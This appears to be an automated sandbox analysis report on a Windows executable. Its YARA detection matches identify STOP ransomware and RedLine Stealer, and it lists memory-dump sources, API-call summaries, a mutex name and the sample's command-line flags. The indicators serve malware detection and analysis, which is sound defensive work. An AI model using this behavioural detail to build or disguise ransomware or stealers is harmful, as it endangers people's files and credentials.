Source: 7.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 7.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0.2.file.exe.21a15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 12.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0.2.file.exe.21a15a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 12.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0.2.file.exe.21a15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0.2.file.exe.21a15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 7.2.file.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 7.2.file.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 6.2.file.exe.22315a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 6.2.file.exe.22315a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.2.file.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.2.file.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 13.2.file.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 13.2.file.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 4.2.file.exe.21e15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 4.2.file.exe.21e15a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 11.2.file.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 11.2.file.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 4.2.file.exe.21e15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 4.2.file.exe.21e15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 12.2.file.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 12.2.file.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 13.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 13.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 3.2.file.exe.22f15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 3.2.file.exe.22f15a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 10.2.file.exe.22c15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 10.2.file.exe.22c15a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 11.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 11.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000006.00000002.1978609190.00000000020F6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000003.00000002.1882592220.0000000002177000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000A.00000002.2056830480.00000000020FE000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000C.00000002.2066559473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000C.00000002.2066559473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000004.00000002.2105224464.0000000002148000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.1752226229.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000B.00000002.1992636135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000B.00000002.1992636135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000000.00000002.1752159390.000000000210D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000A.00000002.2056958884.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000006.00000002.1978697322.0000000002230000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000004.00000002.2105284111.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000003.00000002.1883209457.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000007.00000002.1892636740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000007.00000002.1892636740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0000000D.00000002.2936140866.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000D.00000002.2936140866.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: Process Memory Space: file.exe PID: 6708, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: file.exe PID: 6956, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: file.exe PID: 7164, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: file.exe PID: 5576, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: file.exe PID: 7060, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: file.exe PID: 5644, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: file.exe PID: 600, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: file.exe PID: 3512, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: file.exe PID: 5944, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: file.exe PID: 4904, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23

Source: file.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: file.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.rans.troj.evad.winEXE@18/232@4/2

Source: C:\Users\user\Desktop\file.exe

Code function: 1_2_00411900 GetLastError,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,_memset,lstrcpynW,MessageBoxW,LocalFree,LocalFree,LocalFree,

1_2_00411900

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0210D7C6 CreateToolhelp32Snapshot,Module32First,

0_2_0210D7C6

Source: C:\Users\user\Desktop\file.exe

Code function: 1_2_0040D240 CoInitialize,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,CoUninitialize,CoUninitialize,CoUninitialize,__time64,__localtime64,_wcsftime,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,swprintf,CoUninitialize,CoUninitialize,

1_2_0040D240

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\geo[1].json

Jump to behavior

Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe

Mutant created: \Sessions\1\BaseNamedObjects\{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}

Source: C:\Users\user\Desktop\file.exe	Command line argument: --Admin	1_2_00419F90
Source: C:\Users\user\Desktop\file.exe	Command line argument: IsAutoStart	1_2_00419F90
Source: C:\Users\user\Desktop\file.exe	Command line argument: IsTask	1_2_00419F90
Source: C:\Users\user\Desktop\file.exe	Command line argument: --ForNetRes	1_2_00419F90
Source: C:\Users\user\Desktop\file.exe	Command line argument: IsAutoStart	1_2_00419F90
